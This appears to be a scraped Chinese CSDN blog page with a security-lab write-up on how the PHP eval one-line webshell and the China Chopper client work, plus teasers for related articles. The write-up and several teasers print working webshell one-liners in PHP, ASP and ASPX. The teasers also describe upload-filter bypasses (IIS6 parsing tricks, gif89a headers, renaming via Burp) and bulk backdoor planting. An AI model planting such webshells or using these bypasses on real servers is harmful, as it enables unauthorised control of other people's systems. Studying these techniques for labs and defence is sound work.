中国菜刀与一句话木马之间的原理分析

最新推荐文章于 2024-03-16 12:00:00 发布
最新推荐文章于 2024-03-16 12:00:00 发布
阅读量3.8k 收藏 22
点赞数 6
文章标签: 中国菜刀原理
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43592994/article/details/90647064
版权

参考文章 https://blog.csdn.net/gscaiyucheng/article/details/24911375 http://www.ifuryst.com/archives/caidao.html https://www.yongshen.me/index.php/archives/1199.html

0x00前言

前段时间在做sql注入实验室的时候 需要用到 dump into 的这个函数将一句话木马写入到服务器中 再使用中国菜刀进行连接 至于原理就不知道了 所以通过前几天的学习 把原理弄了一下 所以便来写一下write up

0x01一句话木马原理解析

我常使用的php一句话 <?php @eval($_POST[key]); ?> 很多时候都会把 一句话木马传到服务器上面 那么这是上面原理呢 eval函数 会将括号里面的代码通过php语言来进行执行 $_POST函数的意思就是来收集 请求方法为post 的名字为key表单里面的值 所以这个一句话木马的密码其实就是表单的名字

0x02中国菜刀原理解析

中国菜刀是一个非常方便的工具我们在使用的过程中可以直接添加 然后选择脚本的类型 输入密码就可以连接了 至于原理前几天我查看了些资料今天来总结一下 中国菜刀的本质其实就是 模拟发包

所以我们先从简单的说起 在这里我使用的是火狐浏览器 的hackbar 来实现发包 事先我先上传了res.php 的内容为<?php @eval($_POST[‘key’]); ?> 然后通过hackbar 发包 如下图

最低0.47元/天 解锁文章
一句话木马拿Shell与菜刀原理
悦分享
07-12 1637
1. 直接上传asp asa jsp cer php aspx htr cdx 格式的木马,不行就加个空格或是利用IIS6.0解析漏洞,常见格式:1.asp;1.jpg 或 1.asp;.jpg 或 1.asp;jpg2. 有时上传图片格式的木马,居然被程序检测拦截了,右键记事本打开木马,在代码最前面加上gif89a,再数据库备份备份成asp格式的木马拿下shell。3. 上传图片格式木马,复制地址到数据库备份备份成asp格式木马,有时不成功的话,就利用IIs6.0解析漏洞,格式:1.asp;
php一句话木马菜刀,如何基于菜刀PHP一句话实现单个文件批量上传?
weixin_35741494的博客
03-09 1986
本文原创作者:安全小飞侠0x00 前言很多时候当我们通过某个通用型RCE漏洞批量抓取了很多的webshell后,可能想要批量传个后门以备后用。这时,我们不禁会面临一个问题,使用菜刀一个个上传显得太慢,那么如何快速的实现文件的批量上传呢?本文尝试以菜刀的php一句话为例来分析一下如何实现这类需求。0x01 原理分析首先,我们必须了解菜刀是如何通过一句话木马来实现web服务器的文件管理的。下面是最常见...
ctf中国菜刀连接一句话木马
weixin_41038905的博客
05-06 6917
中国菜刀下载地址,试了好几个版本的就这个好用: https://pan.baidu.com/share/link?shareid=871753024&uk=388464620 上传一句话木马: <?php @eval($_POST['hacker'])?> 将一句话木马另存为one.jpg,通过Burp抓包改包上传为one.php 通过菜刀连接: 在空白位置右键-》添加 ...
一句话木马原理介绍和中国菜刀原理的介绍
Firebasky的博客
06-07 6744
菜刀,c刀,蚁剑都使用过。而且他们的方法基本上差不多。 今天突然心血来潮写来研究一下一句话木马菜刀原理。 下面的原理是自己看其他大佬写的和自己总结的一些介绍。 希望能够帮助老表们~~~ 一句话木马原理 我这里就分析一下PHP代码,其他代码基本上差不多。希望老表们可以自己进行分析。 我们来看一下经典的一句话木马 <?php @eval($_POST['123']); ?> 前面的@表示如果脚本出现错误,则不显示错误。下面就是没有@的时候。会报错! 这里是加了@,则不会进行报错 ev
中国菜刀+文件上传漏洞一句话木马
dongxieaitonglao的博客
03-19 2322
<?php @eval($_POST['chopper']);?> <?php @eval($_REQUEST['cmd']);?> REQUEST是在网页端输入变量访问,POST则是使用中国菜刀之3类的工具连接,C/S架构。 编辑shell的时候,主机写 localhost egrep命令:查找文件内包含指定字符的文件。 中国菜刀的详细使用: 文件管理,查被上传木马网站的服务器文件架构 数据库管理,在编辑中配置完后,可以连接被上传木马网站的数据库(不知道,所以需要sql注入
中国菜刀原理
weixin_34409822的博客
05-25 640
用了菜刀用了也有一段时间了,感觉挺神奇了,这里做一个小小的探究吧,起始也就是用鲨鱼抓包看看软件是怎么通信实现的,不敢卖弄知识,权当学习笔记了,大神路过呵呵这货就是主界面,环境啥的就随意了,IIS,阿帕奇,阿金科斯都可以,我这里用apache,因为之前搞的是PHP开发,对PHP相对比较熟悉,随机就用PHP的一句话来做实验了,Asp和jsp的原理应该都差不多。服务端的.php是这...
CTF竞赛实战 中国菜刀一句话木马
热门推荐
keep coding
05-05 7万+
中国菜刀下载地址: http://pan.baidu.com/share/link?shareid=871753024&amp;uk=388464620一.基本操作:往目标网站中加入一句话木马,然后你就可以在本地通过中国菜刀chopper.exe即可获取和控制整个网站目录二.实战asp的一句话是:&lt;%eval request ("pass")%&gt;aspx的一句话是:&lt;%@ P...
中国菜刀php一句话,中国菜刀之写一句话木马变形
weixin_39879674的博客
04-01 930
了解一句话脚本的工作原理一句话脚本的工作原理:一句话恶意脚本分析服务端与客户端。(此处以asp脚本语言简述原理)一句话恶意脚本服务端就是我们要用来插入到asp文件中的asp语句,(不仅仅是以asp为后缀的数据库文件),该语句将回为触发,接收入侵者通过客户端提交的数据,执行并完成相应的操作,服务端的代码内容为 其中pass可以自己修改一句话恶意脚本客户端(即为中国菜刀主程序)用来向服务端提交控制数据...
一句话木马原理与实战
V
07-30 3458
一句话木马原理与实战介绍常用一句话木马分析一句话木马一句话使用方法实战 介绍 一句话木马短小精悍,而且功能强大,隐蔽性非常好,在入侵中始终有强大的作用。 常用一句话木马 php一句话木马:    <?php @eval($_POST[value]);?>    aspx一句话木马:   <%@ Page Language=“Jscript”%>   <%eval(Re...
中国菜刀上传一句话木马,巴西烤肉提权
qiu_zhang_的博客
04-26 2498
如何使用中国菜刀上传一句话木马呢,今天我来教大家 首先在你的电脑上创建一个文本文件,内容写上一句话木马,可以是asp,也可以是PHP,注意更改value值。但是最后文件名后缀要改成.jpg。格式可以如图所示 在搭建好的网站中上传.jpg文件,会看到,上传以后的文件路径发生了改变,复制好这个文件路径。 打开中国菜刀,空白处右击,添加,将你的网址和你刚刚复制的文件路径粘贴上去。注意下图,在地址右侧小...
一句话与中国菜刀的用法
netuser1937的博客
12-19 5377
一句话与中国菜刀的用法
上传漏洞(一句话木马中国菜刀使用、DVWA文件上传漏洞利用)
最新发布
m0_59598029的博客
03-16 833
复制此路径,在菜刀中右键——添加——粘贴到地址栏——后面栏输入密码x——脚本类型选php——编码选gb2312——添加。将文件名修改为10.php,上传文件类型仍然是image/jpeg,可绕过上传过滤。可对图片文件添加一句话木马,再修改为.php上传,会解析为图片上传此文件。再右键此站点,选择要执行的命令——选文件管理,可操作此服务器上所有文件。即:http://ip/hackable/uploads/10.php。可以修改php文件后缀为其他,再上传。小马:文件体积小、上传文件、文件修改、文件管理。
2017-01-27-一句话木马原理详解
Be Smart
03-17 4894
layout: post title: “一句话木马原理详解” categories: [网络安全CyberSecurity] tags: [一句话木马] 作者:愤怒的小辣椒 链接:https://www.zhihu.com/question/269213687/answer/1088999932 来源:知乎 著作权归作者所有。商业转载请联系作者获得授权,非商业转载请注明出处。 首先理解,eval()是把里面的内容按照php代码去执行 菜刀通过你的一句话木马去进行http请求,然后用经过base64编.
中国菜刀的使用
xy_wjyjw的博客
10-27 250
中国菜刀实现与一句话木马联动:中国菜刀在本地(攻击机)。一句话木马在服务器(靶机)上。WebShell Manager管理工具。
技术剖析中国菜刀原理
gscaiyucheng的专栏
05-03 4451
用了菜刀用了也有一段时间了,感觉挺神奇了,这里做一个小小的探究吧,起始也就是用鲨鱼抓包看看软件是怎么通信实现的,不敢卖弄知识,权当学习笔记了,大神路过呵呵
php解密 eval( base64_decode,base解密_php base64_decode解密
weixin_39777967的博客
03-10 2683
摘要 腾兴网为您分享:php base64_decode解密,银行帮,悟空单车,伪装定位,微商助手等软件知识,以及迷你盒子,固态硬盘优化软件,文华财经随身行,图片剪切工具,羊毛省钱,cygwin,极简名片,swf转avi,订货易,中国移动办公系统,发财猫,大地魂酒,比赛平台,锤锤小矮人,声之形等软件it资讯,欢迎关注腾兴网。eval base64_decode解密的方法,在修改程序代码时,往往会碰...
php解密 eval( base64_decode,PHP之eval(gzinflate(base64_decode加密解密
weixin_39942992的博客
03-10 2120
从网上下载了个php版本的小游戏站的源码,一直都没有时间看,今天闲着没事看了下各个文件夹的内容,有一个文件引起了小胡的注意,文件名为php.php,打开之后发现了是加密过后的php文件,于是试着找了下相关的解密。按照eval(gzinflate(base64_decode的解密方法,发现这是一个PHP的木马shell哦,还有解密之后看到了登陆的密码。于是打开phpstudy,进入这个php的木马,...
MacCMS8.0漏洞利用工具:一句话木马菜刀连接
该工具的描述提到,它可以用于获取服务器的shell权限,操作者只需通过简单的一句话木马命令传递,结合常用的后门控制工具'菜刀'进行连接即可实现控制。工具的标签中包含了'horsen9f'、'getshell'、'MacCMSgetshell'...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值